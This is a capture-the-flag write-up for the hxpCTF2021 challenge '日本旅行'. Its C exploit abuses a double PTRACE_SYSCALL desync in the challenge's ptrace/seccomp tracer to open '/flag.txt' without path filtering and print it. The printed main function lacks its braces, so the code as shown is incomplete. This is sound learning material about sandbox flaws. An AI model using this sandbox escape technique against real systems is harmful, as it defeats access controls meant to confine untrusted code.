Tags: ptrace sandbox seccomp 

Rating: 5.0

Full solution [here](https://github.com/TheMaccabees/ctf-writeups/blob/master/hxpCTF2021/%E6%97%A5%E6%9C%AC%E6%97%85%E8%A1%8C/solution/).

#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/syscall.h>

// Fix VSCode being annoying..
#ifndef AT_FDCWD
#define AT_FDCWD -100
#endif /* AT_FDCWD */

// Definitions
#define STDOUT_FD (1)
#define MAX_FLAG_SIZE (256)

// Exploit for hxpCTF2021 / 日本旅行:
// (inspired by https://gist.github.com/pqlx/bfb932c96b5d8805a6f1781ae2865993 - Thx!)
// We need to somehow "escape" the seccomp/ptrace jail and read the flag file
// under '/flag.txt'.
// The main thing preventing us from straight up reading the file is the fact
// that our "host" (tracer) waits on every syscall we make, and if it is one
// of "open"/"openat" - it canonializes the path and sanitizes it.
// The vulnerability is in the path validation flow - when the tracer validates the
// open/openat path, it accidentally calls "ptrace(PTRACE_SYSCALL, stop->pid, NULL, NULL);"
// twice (once at 'handle_syscall()', and right afterwards at ST_SYSCALL flow at "guardian()").
// Usually, the second call to ptrace fails with ESRCH and everything is fine.
// But, if after the first PTRACE_SYSCALL call, our tracee calls another syscall,
// we get a PTRACE_SYSCALL on syscall-entry - without filtering! (Practically - we de-sync
// the 'proc->in_syscall' state).
// This allows us to call 'openat("/flag.txt")' without path filtering, and thus
// to read the flag!
int main(void)
// Exploit host path filtering in order to open '/flag.txt' file
int flag_fd = -1;
do {
flag_fd = syscall(__NR_openat, AT_FDCWD, "/flag.txt", O_RDONLY);
} while (flag_fd == -1);

// Read out the flag to stdout
syscall(__NR_sendfile, STDOUT_FD, flag_fd, NULL, MAX_FLAG_SIZE);

// Bye-bye!
syscall(__NR_exit, 0);

Original writeup (https://github.com/TheMaccabees/ctf-writeups/blob/master/hxpCTF2021/%E6%97%A5%E6%9C%AC%E6%97%85%E8%A1%8C/solution/payload/payload.c#L16).